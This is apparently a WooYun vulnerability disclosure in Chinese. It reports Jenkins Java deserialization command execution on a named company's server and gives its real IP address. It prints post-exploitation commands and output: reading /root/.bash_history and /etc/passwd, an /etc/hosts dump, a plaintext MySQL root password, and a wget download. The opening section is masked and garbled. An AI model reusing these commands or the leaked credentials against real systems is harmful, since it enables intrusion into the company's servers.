乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-08: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-23: 厂商已经主动忽略漏洞,细节向公众公开
www.sudiyi.cn
1.http://**.**.**/loginfrom=%2f_***************^列化^********************22834b66b949e87956bd.png&qu**********.0.0.1 l**********ops01.s**********.localdoma********************esirable for I**********-localhost **********p6-al**********-allro********** iZ23vc********** iZ23dt********************kins **********rrors.jen********** ruby.s********************egrate to**********ira.su**********archive.**********wnloads.********************o reach **********aven.s********************oading of dl**********-ssl.go********************de&g********************^^^**********bba3d2d5b0511b67a3ac.png&qu********************bash_h********** ^**********tory|gre**********ot -p **********dY10055&l********************些^**********gt;cd*****2.://**.**.**//203.130.55.95/ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130bbkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm&3.://**.**.**//203.130.55.95/ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130bbkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm&*****de&g**********^^**********7aa32f7a4a50f1f9b839.png&qu**********c/pa**********0:root:/roo**********r/sbin:/usr/**********n:/usr/sb**********v:/usr/sb**********nc:/bin:/**********/games:/usr/**********he/man:/usr/**********l/lpd:/usr/**********mail:/usr/s**********ool/news:/us**********spool/uucp:/**********:/bin:/usr**********:/var/www:/us**********r/backups:/us**********ager:/var/list:**********un/ircd:/usr**********tem (admin):/var/li**********:/nonexistent:**********::/var/li**********home/syslo**********:/var/run/d**********ome/ntp:/**********run/sshd:/us**********,:/home/li**********ver,,,:/nonex**********r,,,:/nonexis**********sr/lib/pars**********ment daemon,,,:/var**********,,,:/var/lib/**********:/home/sdy**********ssian JIRA:**********assian JIRA**********assian JIRA**********assian JIRA**********assian JIRA**********ian Confluence:**********cod*****
www.sudiyi.cnhttp://112.124.60.190:8081/login?from=%2fjenkins java反序列化命令执行
127.0.0.1 localhost127.0.0.1 devops01.sudiyi.cn127.0.1.1 localhost.localdomain localhost# The following lines are desirable for IPv6 capable hosts::1 localhost ip6-localhost ip6-loopbackff02::1 ip6-allnodesff02::2 ip6-allrouters10.168.208.86 iZ23vcyqu9dZ10.160.62.232 iZ23dtey008Z# For Jenkins Update199.193.196.24 mirrors.jenkins-ci.org10.168.66.248 ruby.sudiyi.cn# For jenkins integrate to jira server127.0.0.1 jira.sudiyi.cn140.211.11.131 archive.apache.org54.230.125.6 downloads.gradle.org# For jenkins to reach maven repo127.0.0.1 maven.sudiyi.cn# Temporarily disable loading of dl-ssl.google.com#127.0.0.1 dl-ssl.google.com
root权限
cat /root/.bash_historymysql 密码
history|grep mysqlmysql -u root -p sdY10055mysql -u root -psdY10055
cdn的一些信息
cd /tmp/weget 'http://203.130.55.95/ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130b?bkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm'wegt 'http://203.130.55.95/ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130b?bkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm'
根目录
cat /etc/passwd
root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologinlibuuid:x:100:101::/var/lib/libuuid:syslog:x:101:104::/home/syslog:/bin/falsemessagebus:x:102:105::/var/run/dbus:/bin/falsentp:x:103:109::/home/ntp:/bin/falsesshd:x:104:65534::/var/run/sshd:/usr/sbin/nologinlive:x:1000:1000:,,,:/home/live:/bin/bashmysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/falsenginx:x:106:115:nginx user,,,:/nonexistent:/bin/falseparsoid:x:107:116::/usr/lib/parsoid:/bin/falsecolord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/falsejenkins:x:109:119:Jenkins,,,:/var/lib/jenkins:/bin/bashsdyops:x:1001:1001::/home/sdyops:/bin/bashjira:x:1002:1002:Atlassian JIRA:/home/jira:jira1:x:1003:1003:Atlassian JIRA:/home/jira1:jira2:x:1004:1004:Atlassian JIRA:/home/jira2:jira3:x:1005:1005:Atlassian JIRA:/home/jira3:jira4:x:1006:1006:Atlassian JIRA:/home/jira4:confluence:x:1007:1007:Atlassian Confluence:/home/confluence:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)